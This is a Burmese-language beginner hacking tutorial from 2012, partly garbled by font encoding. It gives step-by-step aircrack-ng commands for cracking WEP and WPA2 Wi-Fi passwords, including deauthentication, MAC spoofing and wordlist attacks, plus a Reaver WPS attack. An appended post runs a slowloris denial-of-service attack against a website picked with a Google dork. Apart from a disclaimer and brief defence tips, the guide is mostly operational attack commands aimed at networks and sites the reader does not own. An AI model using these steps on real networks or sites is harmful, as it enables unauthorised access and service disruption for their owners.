10010100101010101010101010101
01010101010101010101010101010
10101010101010101010101010101
01010101010101101010101010101
01011010101010101010101010101
01010101010101010101010101010
10101010101010101010101010101
01010101010101010101010101001
01010101010010101010010101010
01101010010101010101010101010
10110101010101010101010101010
10101010101010101010101010100
10vbnmqwertyuiopasdfghjklzxcvbnm
WiFi Internet Connection Hacking
WEP,WPA2 Penetration Testing
5/27/2012 For Myanmar IT Begineers (Myanmar version)
3thic0kiddi3
Wifi Hacking Basic By 3thic0kiddi3
ကေနားတနငးငမြာ ငးဖငးလငးေတျေပါလာပါပ၊ဒါေပမယးအနညးငယးေစမငးေနေသတာေႀကာငး
လတငးမသနငးေသဖ၊လငယးေတျအတျကး(တကယးေလလာသ)အငးတာနကးလငးဆတာေတာငးတ
မႀကမြာပ။ယခစာအပးက ငးဖငးခယသစျဖ သငးေပတစာအပးမဟတးပါ။ေဖါကးလရတယး။ပေတာဘယးလကာ
ကျယးမယးဆတာကရြငးပထာတာေလပါ။Educational Purpose Only ဖစးပါတယး။ဒနညးပညာကတတးသျာ
တငး ငးဖငးလငးအာလကေဖါကးနငးမယးလေတာမဆလပါ။အနညးငယးနာလညးသျာပါလမးမညး။ဒစာအပး
က Beginner Level နြငးလကး၍ေရသာထာပါသညး။ကယးေတျ သငးခနးစာမာနြငးအျနးလငးသငးခနးစာမာစ
ေပါငး၍တညးဖတးထာပါသညး။တတနြငးလရငးကသာေဖၚပသျာပါမညး။WEP ေရာ WPA ပါဟကးနညးကေဖၚ
ပထာပါသညး။
ဒစာအပးအတျကးစကာလကးေဆာငး
“တစးလပးစာဖသေကဇ အထမေမအပး”
မေကာငးမြဟသညးဆတးကျယးရာမရြ…..
လအပးေသာပစၥညးမာစတငးစေဆာငးခငး
Laptop တစးလ၊ Xp ဖစးဖစး 7 ဖစးဖစးတငးထာပါရပါသညး။ပေတာ Wireless USB adapter တစးခ၊
TP-Link Wireless adapter သညးယခစာေရေနခနးတျငး 15000ကပးခနးရြသညး။
(Laptop တျငးလ Wireless ပါရမညး)။လအပးေသာေဆာ Back Track 5 , VM ware ဒါပါပ။
(လအပးေသာေဆာ ေဒါငးလပးဆျရနး အငးတာနကးရြလြငးပေကာငးမညး :P)။မရြပါကလအငးတာနကးဆငး
တျငးအသပ၍ေဒါငးလပးဆျနငးပါသညး။
စတငးပငးဆငးပ
Laptop ကဖျငးပါ။ပေတာ လအပးတေဆာ ေတျကေဒါင းလပးဆျဖ Browser တစးခခဖျငးပါ။
Back Track 5 က www.backtrack-linux.org မြာေဒါငးလပးဆျပါမယး။အခဒစာေရေနတအခနးမြာ
Back Track က 5R2 ေတာငးထျကးေနပါပ။အခ Back Track 5 ဖငးပသျာပါမယး။Download လပးဖ
သေတာငးတေဒတာေတျမထညးလရပါတယး။ပပါအတငး GNOME ၊ 32 Bit ၊VM Ware၊ Direct ကေရျ ပါ။
ေဒါငးလပးဆျပါလမးမညး။ကေနားေဒါငးလပးဆျခတနးကအငးတာနကးဆငးမြာပါ။ ၇နာရေလာကးႀကာတယး။
ေဒါငးလပးဆျဖ အတျကးအငးတာနကးဆငးနခငးရငးေတာဆျခငးထာလရတာေပါေနား။အဒေလာကးႀကာလ
စတးပကးမသျာပါန၊ဇျေလာရငးဘာမြလပးတတးမြာမဟတးေတာဖ။Back Track 5ကရလာတာန Zip
ဖညးလကးပါ။ပေတာ VM ware ကေဒါငးလပးလပးဖ www.vmware.com/products/player က
သျာပါ။ေဒါင းလပးဆျပ VM ware ကစကးမြာအငးစေတာလပးပါ။
VM ware က Install လပးရတာလျယးပါတယးအခာေဆာ မာနညးတပါပ။အငးစေတာလပးပပပါအတငး
File >open virtual machine ကေရျ ပါ ။မမကျနးပတာထက Back Track 5 zip ကဖညးထာတာကေရျ
လကးပါ။
ပရငး Play Virtual Machine ကနြပးပ Back Track 5 ကစတငးေမာငးနြငးလကးပါ။Back Track က Boot လပး
ေနတာေတျ ပါလမးမယး။ပမြာ Boot လပးေနပကႀကညးပါ။
Boot လပးေနရငး Bt login ေတာငးပါလမးမယး။ bt login က root လထညးပါ။ Password က toor လထညးပါ။
ပရငး root@bt မြာ startx လရကးပါ ဒါဆ VM Ware ထမြာ BT 5 တငးပပါပ။ပမြာတငးပပကႀကညးပါ။
ဒါဆ ကေနားတ Windows 7 သေနရငးန Back
Track 5 သနငးပါပ။Back Track ဆတာ Linux အႏျယး ငးတစးခပါ Security သမာေရာ၊ Hacker
ေတျပါအသပေနႀကပါတယး။Linux ေလလာေနသမာအတျကး Back Track ကအေထာကးအကေပမြာပါ။
ငးဖငးလငးတစးခဟကးႀကညးခငး (WEP Cracking)
Wifi လငးေတျကမာေသာအာဖငး WEP လငး WPA လငး WPA2 လငးဆတာရြႀကပါတယး။
အရြညးေကာကးေတျသခငးရငးေတာ Google မြာရြာဖတးလကးႀကပါ။Beginner တစးေယာကးအဖ ကေတာ WEP
တ WPA တမသႀကေပမယးပသနာမဟတးပါ။WEP ကေဖါကးရလျယးပါတယး။ေဆာ ေတျနညးလမးေတျမာ
ႀကရြပါတယး။မမေဖါကးထျငးမယးပတး နးကငးမြာ WEP လငးရြလကေတာ ေပားရမြာပါ။လကးေတာကငးဖငး
Connector ေလကေထာကးႀကညးတာန အနနာကငးဖငးလငးေတျေပၚေနတာေတျမြာ ပါ။အဒလငးေတျက
ေထာကးႀကညးရငးဖငး ဘယးလငးကေတာ WEP,ဘယးလငးကေတာ WPA2-PSK ဆတာပေနမြာပါ။အခ
ကေနားတ ငးဖငးဟကးဖ အတျကး Wireless USB adapter က လကးေတာမြာတပးဆငးလကးပါ။VM ware
န Back Track 5 ကဖျငးထာလကးပါ။Back Track က Terminal ကဖျငးပါ ပမြာပထာပါတယး။Terminal
ဆတာ Windows က cmd နသေဘာတရာတပါတယး။Command ရကးလရတေနရာပါ။
ပထမဆ Command ရကးပါမယး။
airmon-ng လ ရကးပါ Enter ေခါကးပါ။အဒမြာ Interface ,Chipset တေအာကးမြာ wlan0 လ adapter
ရ detail တစးေႀကာငးကပပါလမးမယး။အဒါဆ Adapter က BT5 ကသပါပ။ဆကးလပးလ ရပါပ။
ဒတယ Command ရကးပါမယး။ airmon-ng start wlan0 ပါ Enter ေခါကးပါ။ ေနာကးတစးေႀကာငး
တတယ Command ရကးပါမယး။ airodump-ng mon0 ပါ Enter ေခါကးပါ။အဒ ကျနးမနးကရကးတာန ကယး
အနနာက ငးဖငးလငးမြနးသမြပပါပ။အဒမြာ ဘယးလငးကေတာဖငး WEP ဘယးလငးကေတာ WPA2
ဆတာပေနမြာပါ သငးရ Target wifi လငးက WEP ပါ (WPA hack ကေနာကးတျငးေဖၚပမညး)။သငးေဖါကးခငး
တ WEP လငးတစးခခကေရျ လကးပါ။
ကေနားထမြာေတာ laptopdct ဆတလငးက WEP လငးဗ။ကနးတ ငးဖငးလငးေတျက WPA2 လငးေတျခညး
ဒေတာ ကေနးာ Laptopdct ဆတလငးကေဖါကးႀကညးမယး။သနပါတးသတးတ BSSID နပါတးေတျကပါ။
C8:3A:35:2F:E7:30 ပါ။လငးတစးခနတစးခ BSSID မတပါခငးဗ။ပေတာ CH ကမြတးပါ CH ဆတာ Channel
ပါ။laptopdct ရ Channel (CH) က 11 ဖစးပါတယး။ပရငး Command ေနာကးတစးေႀကာငးရကးပါမယး။
ကျနးမနးက airodump-ng –w –tuan –c 11 --bssid C8:3A:35:2F:E7:30 mon0 ပါ။
ဒေနရာမြာ tuan ဆတာဖငးနမး (File name) ပါႀကကးတနာမညးထညးလရပါတယး။ -c ရေနာကးမြာေတာမမ
Terget ရ CH နပါတးကထညးရပါမယး။ C8:3A:35:2F:E7:30 ရ ေနရာမြာလ မမ Terget ရ BSSID ကထညး
ရပါမယး။ပရငး Enter ေခါကးပါ။အဒအခါ ကယး Target ရလငး Data အေနအထာသသနးေပၚလာပါမယး။
ပမြာႀကညးပါ။
ပရငး Terminal အသစးေခၚပါ။ aireplay-ng -1 0 -a C8:3A:35:2F:E7:30 mon0 လရကး
Enter ေခါကး။အဒအခါမမ Request ေတျက Send လပးတာေတျ ရမယး (sending auth)။ပရငးေနာကး
Command တစးေႀကာငးထပးရကးမယး
aireplay-ng -3 -b C8:3A:35:2F:E7:30 mon0 လရကးပါမယး။ထ အခါကယး ပတ Request ဖငးေတျက
Read လပးေနတာေတျပါလမးမယး။Read ရတာမာေလေလ ကယးတာဂတးရ Data တကးလာေလေလ
ကယး Target ရလငးထကလာေလေလဖစးလာပါတယး။ပမြာပထာပါတယး။
Data မာမာတကးလာေအာငးေစာငးပါ။ေဖါကးဖအချငးေရပေကာငးပါတယး။ဒေနရာမြာ C8:3A:35:2F:E7:30
ကအေသမြတးမထာနလငးေပၚမတညးပ BSSID ေပာငးပါတယး။ပေတာ Aireplay command ေတျမြာ
-1 တ 0 တမရရငး အခာကနးဂဏနးမာထညးစမးႀကညးပါ ဥပမာ 2တ 3 တ ေပါ။တာဂတးရ အေခေန
ေပၚမတညးပအနညးငယးလကးေပာငးနငးပါတယး။သေဘာတရာခငးကေတာတတပါပ။ပမြာ Command
ဿေႀကာငးရကးအပ Data ေတျတကးလာတာကေတျ ရမြာပါ။ေပားဖေကာငးမြာပါ။ကေနာကးဆအဆငးကေရာကး
ပါပ။Data ေတားေတားေလလတကးလာပဆရငး Read packet ေတျလေတားေတားဖတးေနပဆရငး Crack လ
ရေလာကးပါပ aircrack-ng tuan-01.cap လရကးပါ။ေစာေစာကကေနားေပာခသလပ ။Tuan ေနရာမြာႀကကး
တနာမညးထာထနငးတယး။ဒေတာကာ ေစာေစာက tuan ေနရာမြာ အခာနာမညးေပခသေတျက အခာနာ
မညးပနးထညးရပါမယး။ဥပမာ ethickiddie ဆရငး Command က aircrack-ng ethickiddie-01.cap ပါ။
မမဘာနာမညးေပခလညးမသရငး Terminal မြာ ls လ ရကးပႀကညးလရပါတယး။ပမြာ aircrack ကျနးမနး
ကရကးလကးပါပ Opening tuan-01.cap က Crack လပးေနပါပ။
ေနာကးဆမြာေတာ Aircrack ကပကးဆကးေတျကအလလရြာေပေနပါလမးမယး။Key Found
ဆရငးေတာအေတားေပားရမြာပါ။ပမြာ Key ကCrack လပးပေအာငးမငးတပပါ။
ကေနားခရရြတ Key က 3132333132 ပါ ။အဒါမမ Target ရ Password ပါပ။တစးခါတရမြာ။Key က
A3:B5:C11:34:U7:F8:9Q:33 အစရြသဖငးပပါလမးမယးဒါဆ ပကးဆကးက A3B5C1134U7F89Q33 ပါ
WEP Cracking ပပါပ။
WEP ပငးရြငးမာလခေစရနး
Wifi လငးပငးရြငးမာအေနဖငး မမလငးက WEP ဖစးေနရငး WPA2 သေပာငးလသသငးပါတယး။
WEP ဟာေဖါကးဖ ရာလျယးကေနပါပ။ပေတာ မမလငးက BSSID ေဖာကးထာခငးဖငးလကာကျယး
နငးပါလမးမယး။မမအငးတာနကးလငးေလလျနးလာပဆ Restart ခပါ။မမ Network အတျငးမြာ ခတးဆကး
ေနတကျနးပတာမာပမြနးဟတးမဟတးေလလာပါ။နကး ကးမြာလာေရာကး Crack လပးတ Computer
မာရ Mac address က Filter လပးပစးပါ။ဒါမြမရရငး ေပသလကးပါ။သနာပါတယးဗာ။
…………………………………………………………………………………………………………………………………………
WPA2 Cracking (အနညးငယးခကးေသာလငးအာခရကးလပးခငး)
နညးလမး()
WEP ရသေဘာတရာအတငးဆငးတပါတယး။ဒါေပမယး WPA ကလခေရတငးကပးတယး။ဆရာဆရာဟကး
ကာႀကေတျေတာငးမြေခ ျ ပနးေလာကးတ.ယး။WPA2 က ဟကးဖ က Packet Sniffing လပးမလာ?Dictionary
attack နလပးမလာဆတာပါပ Beginner ေတျအတျကးကေတာ Dictionary attack ကအသငးေတားဆပါ။
Packet Sniffing ကကေနားေနာကးေတာေရပါမယး။Dictionary attack ကေတာရရြငးတနညးတစးခပါ
မမေဖါကးမယးလငးရ password က မမမြာရြတ Wordlist နတကးဆငးယပ Crack ယတာပါ။
WPA2 ကအဒနညးနေဖါကးနငးပါတယး။ဒါေပမယး special character ေတျပါတ Strong ဖစးတ Password
ေတျကေတျ ရတအခါအခနးေပရပါတယး။မမမြာ wordlist ေတျမာမာရြရငးေတာ ခရကးတအခါအဆငးေပ
ပါတယး။WPA2 က Dictionary att နတကးဖစတးရြညးရပါမယး။ရပးပစးလမရဖဆကးတကးတကးခကးေနရမယး။
ကေကာငးမြရတတးသလ ခဏေလရသျာတာမရြပါတယး။မမ Target ကပကးဆကးရရြငးေလေတျထာ
ရငးေတာ ကေကာငးတာေပါ ခဏေလန ေဖါကးနငးပါမယး။wordlist ေတျကအငးတာနကးေပၚမြာေဒါင းလပး
ဆျယနငးပါတယး နာမညးႀက wordlist ေတျကေတာ 1.1million wordlist.txt န darkc0de.lst တပါ။
Googleမြာလ WPA2 Crack wordlists လရြာပေဒါငးလပးဆျနငးပါေသတယး။
4shareမြာလရြာဆျနငးပါတ.ယး။အခေတာ 1.1 million wordlist န darkc0de.lst ကအသပပပါမယး။
(1)1.1million wordlist.txt download
http://www.4shared.com/office/tvijWEkA/11million_word_list.html
(2)darkc0de.lst download
http://www.4shared.com/file/AF3e-0Em/darkc0de.html
ပထမဥဆ Back Track 5 ကပနးဖျငးပါ။ေဒါငးလပးဆျလရရြလာတ 1.1 million list န darkc0de ဖငးဿဖငး
က Backtrack 5ထသ ေမာကးစးဖငးဆျယလကးပါ(move)လပးလကးတာဖစးပါတယး။ပမြာပထာပါတယး။
Windows desktop ကေနဆျယလကးတာပါ။
Command box (terminal) ကဖျငးပါ။ airmon-ng ရကးပါ Enter ေခါကးပါ။ပမြာပထာပါတယး။မမ
Adapter Name ကပရငးဆကးသျာလရပါပ။
ေနာကး Command က airmon-ng start wlan0 ပါ Enter ေခါကးပါ။
ေနာကးCommand က airodump-ng mon0 ပါ Enter ေခါကးလကးရငး မမအနကငးဖငးလငးမာက
ေဖၚပေနပါမညး။မမဟကးခငးတလငးတစးခ (WPA2-PSK) လငးတစးခခကေရျ ခယးလကးပါ။
ကေနားထမြာေတာတလငးပရြတယး Backt ဆတလငးပါ။ WPA2-CCMP-PSk ပါ။
ပမြာပထာပါတယး။
ကေနားေဖါကးမယး Backt လငးရ BSSID က F8:DB:7F:46:1D:A1 ဖစးပါတယး။ Channel (CH)က 1 ပါ။
မမ Target ရData ကေသခာေကားပလပးထာပါ။ပရငးေနာကး Command ရကးပါပ။
airodump-ng -w WPACap -c 1 mon0 ပါ WPACap ေနရာမြာ မမနြစးသကးရာဖငးနမးကထညးပါ။
-c ေနာကးက 1 ဆတာ Channel no.ပါ။ပမြာပထာပါတယး။
ပရငးေနာကး Command ရကးပါမယး။Terminal အသစးတစးခဖျငးပါ။
aireplay-ng -0 0 -a {BSSID နပါတးထညး} -c {Client Mac}ထညး mon0 ပရငး Enter ေခါကး။
ဒေနရာမြာမြတးထာဖ က {router mac}ေနရာမြာ မမ Target ရ BSSID နပါတးပါ။{Client Mac}ဆတာက
မမ Target ရ STATION ေအာကးက နပါတးဖစးပါတယး။ဒေလာကးဆရြငးပထငးပါတယး။မရြငးေသရငး
ပေတျကႀကညးပမမ Target ရ Data ေတျနအစာထသျာပါ။သပးမခကးပါဖခငးဗာ။ဒ Aireplay Command
ရကးအပမြာ Data ေတျ Send လပးေနတာကေတျရမြာပါ။ေဒတာပ တာမာလာတာနအမြ Target ဆက
စပေရာကးရြးသျာပ မနစးအနညးငယးအတျငးလငးကသျာေစမြာပါ။ပမြာ Sending လပးေနပပါ။
ပရငးေနာကးဆ Command ရကးပါေတာမယး။
aircrack-ng -w /root/desktop/1.1million wordlist.txt WPACap-01.cap ပါ။ကေနားတ က Desktop
ေပၚမြာ1.1 million wordlist.txt ကတငးခလ ဖငးတညးေနရာေပာငးသျာတာပါ။
ပမြာပထာပါတယး။ပမြာကေတာ wordlist file က /pentest ေအာကးမြာထာလ Pentest ေအာကး
လြမးေခၚရတသေဘာပါ။ WPAcap-01.cap ေနရာမြာ မမအရငးက ထာခတ File nameကထညးပါ။
မသရငး Terminal မြာ ls လရကးပႀကညးနငးပါတယး။ဥပမာ မမမြတးခတဖငးနမးက 3thic0kiddi3 ဆပါစ
3thic0kiddi3-01.cap လပနးလညးေခၚယရမြာဖစးပါတယး။
ဒ Aircrack ရကးအပမြာ မမ Wordlist နတကးဆငးစစးေဆပဖစးနငးေခ Password ေတျန
မမ Target ကးေဖါကးေနမြာဖစးပါတယး။Wordlist ကနးသျာတယးပကးဆကးမရေသဖဆရငး
darkc0de.lst နထပးရြာပါ။ဒါမြမရေသရငးအခာ Wordlist ေတျနဆကးရြာပါ။ဇျရြဖ ေတာလပါမညး။
ငးဖငးပငးရြငးေတားေတားမာမာကမမတကယးတငးမမြတးမမြာစလ ပကးဆကးေတျကလျယးလျယးေပထာ
တတးႀကတယး။ဒါမဆရငးေတာအမနးရမြာပါ။လတာရဖဆရငးေတာလျယးလျယးနလကးမေလာဖပါပ။
ႀကစာမြေအာငးမငးမြာပါ။ WPA2 Hacking ပပါပ။
WPA2 Cracking နညးလမး(ဿ)
WPA2 လငးက Crack လပးနငးတေနာကးနညးလမးတစးခပါ Mac Changer Method လေခၚပါတယး။
Mac က Change လပးပ Client ဘကးကေနေဖါကးတနညးလမးတစးခပါ။
နညးလမး နတတပါပ၊အနညးငယးကျာတာပါ။တမမရတမစမးႀကညးေပါေနား။
ပထမဆ Command က airmon-ng start wlan0 ဖစးပါတယး။
ပေနာကး ifconfig mon0 down လရကးပါ Enter ေခါကး
MAC ကကေနားတ ခနးပါမယး။ macchanger -m 00:11:22:33:44:55 mon0 လရကးပါ။
Fake Mac တစးခဖနးတလကးတာဖစးပါတယး။ကေနားတရ လကးရြ MaC ကတစးခခဆပါစ
ကေနားတ ကအခ 00:11:22:33:44:55 လေပာငးလပစးလကးတယး။
ပေတာ ifconfig mon0 up လ ရကးပါ။ပမြာႀကညးပါဥ။
ေနာကးတစးေႀကာငးကေတာ airodump-ng mon0 ပါ။ရြသမြလငးေတျပေပေနပါပ။
ကေနားစကးမြာေတာ WPA2 လငးေတျခညးပေနတယး။ကေနားက Victima ဆတလငးက Targetထာ
လကးပါပ။
မမ Target ရေဒတာကမြတးထာပါ။ရကးရမယး Command က
airodump-ng -c 6 --bssid 1C:7E:E5:32:1D:54 -w crack mon0
(မြတးခကး- Channel No.န BSSID No.ကေတာမမ Target အတငးေပာငးထညးပါရနး)
အဒကျနးမနးရကးအပမြာ မမ Target ရသသနး Data ကပ ပမြာပါ။
Terminal အသစးတစးခဖျငးပါ။
aireplay-ng -0 30 -a {မမတာဂတးရBSSID} -c {Client Macနပါတး} mon0 ကရကးပါ။
ပမြာႀကညးပနမနာယပါဥ။
အဒ Aireplay အပမြာ မမ Target ဆက Request ေတျ Sending လပးေနတာကေတျ ရမြာပါ။
တေဖေဖနပပါအတငး WPA Handshake လေပၚလာတအခါ Crack လပးလရနငးပါပ။
Terminal အသစးတစးခေခၚပါ။
aircrack-ng -w /root/Desktop/darkc0de.lst crack-01.cap ဆပ Enter နြပးပါ။
Darcode အပငး 1.1 million words list ကလသနငးပါတယး။ကေနားတက Word list ကDesktop
မြာထာထာလ root ေအာကးက Desktop လေခၚတာပါ။Crack-01.cap ေနရာမြာ မမေပခတအမညး
ကထညးပါ။၄ငး aircrack ရကးပလြငး Words List ေတျထက Password ေတျန Crack လပးေနတာမငး
ရပါမယး။ေနာကးဆမြာေတာပပါအတငး Key ကရရြလကးပါတယး။
Key Found=abril4de1969 ပါ။ဤသနနရြပးေထျ တာေတာငးခဏနတကးဆငးရြာေဖျရရြနငးပါတယး
Cracking Time ကသပးကမနးဆနးပါတယး။တခခကးခလျနးေသာပကးဆကးမာသာႀကာတတးပါ
တယး။
WPA2 Cracking နညးလမး(ဿ)ပပါပ။
WPA2 ပငးရြငးမာလခစတးခရဖ
WPA 2 ပငးရြငးမာအေနဖငး မမတ၏ Password မာက Default ထာသ၍ေသား၄ငး၊
Password အရြညးႀကစကာလရြပးရြပးေထျ ေထျ မာေပ၍ေသား၄ငး၊Mac address က
Filter လပး၍ေသား၄ငး၊မမ ငးဖငးလငးက နကး ကးမြ Hideလပးထာ၍ေသား၄ငး။ပကးဆကးေပရာ
တျငး မနးမာေဖါငးကသစာလမာသပါက Wordlist ထတျငးမပါေသာေႀကာငး လျယးလျယးနြငး
Hackလရမညးမဟတးပါ။ထ ပငးမမလငးေလလာလ ြငး restart ခလကးပါ။
MY Book Ref: Youtube(WEP,WPA2) Hacking,BT 5 wireless penetration testing book
You Tube တျငးဆကးလကးေလလာနငးမညး Video Training မာ ::::::….. :::….:: ….
http://www.youtube.com/watch?v=y9XV2MBPM5M
http://www.youtube.com/watch?v=FZso9pofw-0
http://www.youtube.com/watch?v=rzzgzP4hEo0
http://www.youtube.com/watch?v=T3iDWP2xeFw
http://www.youtube.com/watch?v=dB21RAvbcDQ
http://www.youtube.com/watch?v=aKQiAAzmW90&feature=fvsr
http://www.youtube.com/watch?v=BiJp9ZajJlg&feature=fvsr
အထကးပါ Video Link မာက Download ဆျပေလလာႀကညးပါ WEP,WPA2 မာက Crackလပးပ
တ Video မာဖစးပါတယး။
………………………………………………………………………………………………………………………………………
ကေနားေလလာမသေလာကးပနးလညး Share လပးေပသညးနညးပညာမာက နာမလညးပါက
[email protected] သတကးရကးဆကးသျယးနငးပါသညး။Hacking သညး Cyber Lawနြငးကငးလျတး
မြမရြပါ။ထေႀကာငးဆငးခငးတရာလကးကငးထာ၍စမးသပးႀကပါ။အမြာအယျငးမာပါ ငးပါကအႀကပစာမာ
စတးႀကကးေပပ နငးပါသညး။၄ငးအႀကပစာမာအရ 2nd Edition တျငးပနးလညးဖညးစျကးေဖၚပသျာပါမညး။
I like all Hackers from BHG,MHF,MHU,Planet Creator,MZ,MCT,Ghost Area
::::::::::Next books Coming Soon see you:::::…
စာဖတးသမာအာအစဥးေလစာလကး
3thic0kiddi3
wpa သ႕မဟတ wpa2/psk ဟကနညး
reaver-1.1 န႕ဟကမာပါ။
bt5 ကဖြငပါ။ terminal မာ
wget http://reaver-wps.googlecode.com/files/reaver-1.1.tar.gz
ျပးရငခနေဆာင
ျပးရင ဖငျဖညမယ tar zxvf reaver-1.1.tar.gz ျပးရင ls
ျပးရင cd reaver-1.1 ျပးရင ls ျပးရင cd src
ျပးရင ./configure ျပးရင make ျပးရင make install ေအာကပေတြကၾကညလကပါ။
လပငနးစမယဗာ
၁။ အရငဆး terminal ၁ခဖြငလကပါ ျပးရင airmon-ng
ရကထညလက ျပးရင airmon-ng start (interface) ရကလကပါ။
ျပးရင airodump-ng mon0
ျပးရင ကဟကခငတ ဟာကၾကညလကပါ။ BSSID CH ESSID အဒါေတြသဖ႕လတယ။
ကေနာဟကခငတာကေတာ BSSID 28:10:7B:8C:7C:22 CH က 3 ပါ ESSID က kira
အေက ဒါဆစျပေနာ terminal ၁ခဖြင reaver -i mon0 -b 28:10:7B:8C:7C:22
လပျပ ထားထားလကပါ။
ကပါစဝကကလာျပ။
Using slowloris script for DDos attack in backtrack 5 Posted by Aung Kyaw Moe
ကြနေတာတ Backtrack မာ slowloris script ကသးျပးေတာ Dos Attack လပပါမယ ………….ပထမဆး ေအာက txt file ကေဒါငးလကပါ…………:P
http://www.mediafire.com/?zdljotrlp1tclp1 ေနာက Desktop ေပါတငထားပါေနာ………..ပမာျပထားတအတငး terminal ထကေနဖငတစခေဆာကပါမယ…….ပထကအတငး command ေပးလကပါ…
ပထကအတငး Terminal ထမာ file တစခကတညေဆာကပါမယ nano command ကသးျပးေတာေပါ nano slowloris.pl လရကလကပါ ေအာကကပအတငး ထြကလာပါ လမမယ………..:P
ပမာျပထားတအတငးပေစာေစာကေဒါငးလဒလပထားတ .txt file ကဖြငလကပါေနာက Terminal မာေဆာကထားတ ဖငထက ပမာျပထားတအတငး ctrl+a ကနပျပး Termianl ထက ဆြထညလကပါ ပမာျပထားပါတယ ………………………
ေအာကကအတငး Terminal ထေရာကသြားပါလမမယ…………………..:P
Save လပပါမယ……………. ctrl+x ကနပလကပါ………..ေအာကကပအတငးေပါလာပါလမမယ
slowloris.pl ဆတနာမညန save မလားလေမးပါလမမယ Enter နပလကပါ…………Home Folder ေအာကကေရာကသြားပါလမမယ desktop ေပါေခါတငလကပါ……..:P
chmod 775 slowloris.pl လရကလကပါ………… အ chmod 775 ဆတာကနညးနညးရငးျပပါမယ chmod ဆတာ read , write ,execute for all ျဖစပါတယ ေနာက target site ကရာပါမယ Dork တစခကသးပါမယ လြယလြယကက inurl:php?id=1 လ Google မာရာလကပါ……………..:P
ကယျကကတဆဒတစခကေရြးလကပါ………….:P ေအာကကဆဒကကြနေတာေရြးလကပါတယ………..:D
perl ./slowloris.pl -dns http://www.target.com လရကလကပါ
သစတငအလပလပေနပါျပ ေအာကကပမာျကညပါ
က Terminal ကဖြငထားျပးေတာခဏကဖြငထားတဆဒက reload လပပါမယ ကသြားလားမကဘးလားသရေအာငပါ reload လပလကပါ……………………………
ကသြားပါျပ…အဓကေျပာခငတာကေတာ Terminal ကမပတလကဖပါပ………. Terminal ကပတလကရင DDos ကအဆးသတသြားမာျဖစပါတယ………………..။
ေကးဇးတငပါတယ ဆကလကျကးစားပါအးမယ……….:P